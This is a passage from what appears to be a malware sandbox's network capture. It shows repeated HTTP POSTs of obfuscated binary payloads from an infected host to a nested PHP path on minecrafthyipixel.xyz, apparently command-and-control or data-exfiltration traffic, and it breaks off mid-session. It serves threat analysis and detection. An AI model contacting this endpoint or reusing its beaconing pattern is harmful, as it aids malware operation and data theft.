154 | 192.168.2.4 | 49908 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:44:13.515711069 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
Apr 19, 2024 13:44:13.620583057 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:44:13.620908976 CEST | 2512 | OUT | Data Raw: 57 5a 5e 5a 5c 40 51 59 5c 5e 59 59 57 51 58 53 54 5b 5f 5a 54 5a 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^Z\@QY\^YYWQXST[_ZTZS^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&.>U5+<\$0?'+W=8#&)0W1;" 16U=?_#Z$.$[. X =
Apr 19, 2024 13:44:13.884989023 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:13 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=917bg6y2RHRUs6XWYuLhROBJO%2BUGzVGreGyrH4ODADh%2BM6hDu8BdhghCxTacnHNfAp0gtqhtozfOfwnVOGMV8sq5KjkYZ3D2f1fPeQvQ3IuZfrGUjC5roLbtjeali%2BxAjkvaTf74Fu8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca434cde217ff-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:13.885050058 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
155 | 192.168.2.4 | 49909 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:44:14.111999035 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:14.217005014 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:44:14.217255116 CEST | 2512 | OUT | Data Raw: 57 5a 5b 5f 59 42 51 59 5c 5e 59 59 57 52 58 5b 54 5a 5f 58 54 54 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ[_YBQY\^YYWRX[TZ_XTTSY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%1S5;' 0*=; '*#282W 1.V+8+] :$[. X 1
Apr 19, 2024 13:44:14.488500118 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:14 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ICzuxG2i2gnLVeW4Duc%2B7THKqkal%2FWZOeA%2FQuVYA55yx6ha6DNfrXj9GP3298A8mA8XeSbEd9UwUrQ9pdTBrNTCi0duaGon5rBnL7UdavTEhZvjAayz5GZpElmGkmp2hSEID94wBBcA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4388adfb032-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:14.488563061 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    156 | 192.168.2.4 | 49910 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:14.717881918 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:14.823326111 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:14.823451996 CEST | 2512 | OUT | Data Raw: 52 5e 5e 5f 59 41 51 5f 5c 5e 59 59 57 50 58 5a 54 51 5f 59 54 5c 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^^_YAQ_\^YYWPXZTQ_YT\SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'>%!8$+3.>8'_2*#&+=7*4 8:%$[. X
                                                                                                                                    Apr 19, 2024 13:44:15.084517002 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:15 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1h5%2F7L6bGy4UFb3WSI3OqLIHf5Q5Gy5sKsJz1X0hYAWBE0EyOLnEIVQYYcECs37tEBMjBL%2F%2BTkVpiJ6MFuzkZJx%2F6g6UusGvp1arYCZit9dl3fFOYN8SsbKLNMvZMxATQSsBiVMzhaA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca43c5f3b6788-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:15.084584951 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    157 | 192.168.2.4 | 49911 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:15.313389063 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:15.418493986 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:15.418864965 CEST | 2512 | OUT | Data Raw: 57 59 5e 54 5c 40 54 5a 5c 5e 59 59 57 54 58 53 54 53 5f 56 54 5f 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^T\@TZ\^YYWTXSTS_VT_S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%X>T"8$\'3$'81U>820S%+P4!5*/\#<_/%$[. X )
                                                                                                                                    Apr 19, 2024 13:44:15.775984049 CEST | 629 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:15 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rU%2BzM%2FA%2FQhHc7LmKke3cGrN9RatJqGiA%2FXYeN%2B35KOHeBjHZqUJ28rR5cK2VaKkJu7d3YebqUph44MbV51iFZ2HO5nO%2F21V3vEMuhR1QGq%2FxRnlaatixR61cS%2FpXlDXTvdduiaW1LLo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4400a9953b9-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:15.776045084 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    158 | 192.168.2.4 | 49912 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:15.996684074 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:16.101279974 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:16.101396084 CEST | 2512 | OUT | Data Raw: 52 5a 5e 5f 5c 40 54 5a 5c 5e 59 59 57 53 58 52 54 5a 5f 5a 54 5f 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ^_\@TZ\^YYWSXRTZ_ZT_S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%12T6(X3 00;)+19R1+.P72)+'4?<-5$[. X 5
                                                                                                                                    Apr 19, 2024 13:44:16.358812094 CEST | 625 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:16 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mgFWMjw39U%2BvrBO2yYP7Diw%2FdotlLYV5WdS7t4%2Fn%2FlEt%2Fg4zRK2RIj2DqCTod57UISB1eFQCk9jbDS7Z%2FYkvFCUz5IE25ZO3aFwPh55zowYdsOnG8HopbzRVBTXVeqeqPaBZ22s4jxc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4445cf47ba2-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:16.358875990 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    159 | 192.168.2.4 | 49913 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:16.576459885 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:16.680862904 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:16.680963993 CEST | 2512 | OUT | Data Raw: 52 5d 5e 5b 59 4a 54 5f 5c 5e 59 59 57 56 58 5a 54 56 5f 5b 54 5f 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R]^[YJT_\^YYWVXZTV_[T_SZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_1X*W6$]$ ?3-W=8<&),%;"72&V)]$ ;.$[. X !
                                                                                                                                    Apr 19, 2024 13:44:16.965631962 CEST | 617 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:16 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yXVyF4jAfRdNVW4QuqrYnfcw52EtMnrgumoL7ziCzC9RM8D5x9EK4rJ8RPB86OTrVquZEDwGtEa239NuUDgPz%2BFN3sQZsE%2F2xJVnx1vHPVSQcR6ClyGBxywkOWQ8dbAHQFcj69xdIy0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca447fb358831-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:16.965692997 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    160 | 192.168.2.4 | 49914 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:17.185497999 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:17.290391922 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:17.290540934 CEST | 2512 | OUT | Data Raw: 52 59 5e 5a 59 44 51 5d 5c 5e 59 59 57 53 58 52 54 56 5f 57 54 5c 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY^ZYDQ]\^YYWSXRTV_WT\SZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%>&U ;\07\%8.*#Y2 $;>#"T=8<"<(:$[. X 5
                                                                                                                                    Apr 19, 2024 13:44:17.641258001 CEST | 625 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:17 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2Fs5AS5apuhHbR9%2FEmzuo1qPxIWQ8ZvP6vNg9eW84bbgoQxdbk4cfB49ZEG3%2FkNasEmgOht9J%2B8Iookd6FiAO799sn9NtysJVkPPiinlbMc%2F0CIleOoRHLd%2BSZM64RcFtb8ght3nh3s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca44bb8387bbe-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:17.641321898 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    161 | 192.168.2.4 | 49915 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:17.871247053 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:17.976428032 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:17.976902008 CEST | 2512 | OUT | Data Raw: 52 5e 5e 58 59 41 54 5e 5c 5e 59 59 57 55 58 5d 54 50 5f 56 54 5b 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^^XYAT^\^YYWUX]TP_VT[S^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'>5 +Y3']0+>8& R%]" "P*;;\"? [9$[. X -
                                                                                                                                    Apr 19, 2024 13:44:18.337733030 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:18 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r37DrnFjd5z39dZCZGGroka3nIe0t7gHDcBM49FKY2aNVozWdN2qSr7uyqJdLsCq%2FJR%2B55G1W2Xhg4jbXNJndgVqkpbOMUH1QcvizGsxaKv3tGdfL%2FGnLzhUt%2Btj87EpYBR7e2GsVjQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4500bd46758-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:18.337794065 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    162 | 192.168.2.4 | 49916 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:18.410880089 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2192
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:18.515522957 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:18.515650034 CEST | 2192 | OUT
                                                                                                                                    Apr 19, 2024 13:44:18.774802923 CEST | 770 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:18 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oGa5ySIL%2Fkm9YbjCw0UgftcghJi3S%2BBYObvwJGzxEX5%2FAyL5hFMS3o5DjIpPtEKdj6PvFCLFWZ8t6EsMIuwicrtmHoOK%2FlCx2PwMyo7Hi7EvnaGcaPwoG8GNKHRwVLAKgaeTCpRKx2g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4536a5c6734-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Apr 19, 2024 13:44:18.774863005 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    163 | 192.168.2.4 | 49917 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:18.529369116 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:18.634421110 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:18.634707928 CEST | 2512 | OUT
                                                                                                                                    Apr 19, 2024 13:44:19.006458044 CEST | 627 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:18 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
